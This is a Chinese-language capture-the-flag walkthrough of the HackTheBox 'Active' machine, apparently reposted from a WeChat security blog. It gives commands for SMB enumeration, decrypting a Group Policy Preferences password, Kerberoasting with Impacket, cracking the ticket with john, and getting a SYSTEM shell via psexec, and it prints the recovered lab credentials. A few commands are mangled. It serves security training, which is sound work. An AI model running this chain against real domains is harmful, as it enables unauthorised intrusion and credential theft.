靶机信息
靶机地址:
https://app.hackthebox.com/machines/Active
靶场: HackTheBox.com
靶机名称: Active
难度: 简单
提示信息:
无
目标: user.txt和root.txt
实验环境
攻击机:Manjaro 10.10.16.3
靶机:10.10.10.100
信息收集
扫描端口
扫描靶机开放的服务端口
sudo nmap -p- 10.10.10.100
sudo nmap -sC -sV -p 139,389,445,464,593,636,3268,5722,9389,47001 10.10.10.100 -oN nmap.log
扫描到多个开放端口,先来看看139端口
SMB渗透
检测SMB服务信息
enum4linux -a 10.10.10.100
发现几个共享目录,更换smbmap检测
smbmap -H 10.10.10.100
发现共享目录Replication有读取权限,尝试登录搜集信息
smbclient \10.10.10.100Replication
登录成功,发现文件夹active.htb,将文件夹下载到攻击机
recurse ON
prompt OFF
mget *
下载完成,文件不多,来看一看有哪些文件
在active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml文件中发现账号和加密后的密码
cat active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml
但是不清楚这个密码是用来做什么的,到搜索引擎碰碰运气
通过搜索引擎知道这是GPP组策略密码,可以使用gpp-decrypt解密
gpp-decrypt -c "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
拿到密码,尝试用账号密码认证搜集SMB信息
smbmap -H 10.10.10.100 -u SVC_TGS -p GPPstillStandingStrong2k18
发现多个可读共享目录,先来看看Users用户目录
smbclient //10.10.10.100/Users -U SVC_TGS%GPPstillStandingStrong2k18
登录成功,先来看看SVC_TGS文件夹
cd SVC_TGS
ls
cd SVC_TGS
cd Desktop
ls
get user.txt
在SVC_TGS用户的桌面上拿到user.txt,其他共享目录未发现可利用信息
域渗透
通过前面的信息知道这台靶机存在域控,尝试获取域信息
先来绑定hosts
sudo vim /etc/hosts
使用Impacket中的GetUserSPNs.py脚本获取票据
Impacket下载地址
https://github.com/SecureAuthCorp/impacket/tree/master/examples
GetUserSPNs.py active.htb/SVC_TGS -request -save -outputfile user.txt
拿到票据,再来暴破密码
john user.txt -w=../../Dict/rockyou.txt
拿到密码,再使用Impacket中的psexec.py脚本获取shell
psexec.py [email protected]
拿到system权限,来找找flag
cd C:UsersAdministratorDesktop
type root.txt
拿到root.txt,游戏结束
原文始发于微信公众号(伏波路上学安全):渗透测试靶机练习No.117 HTB:Active
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论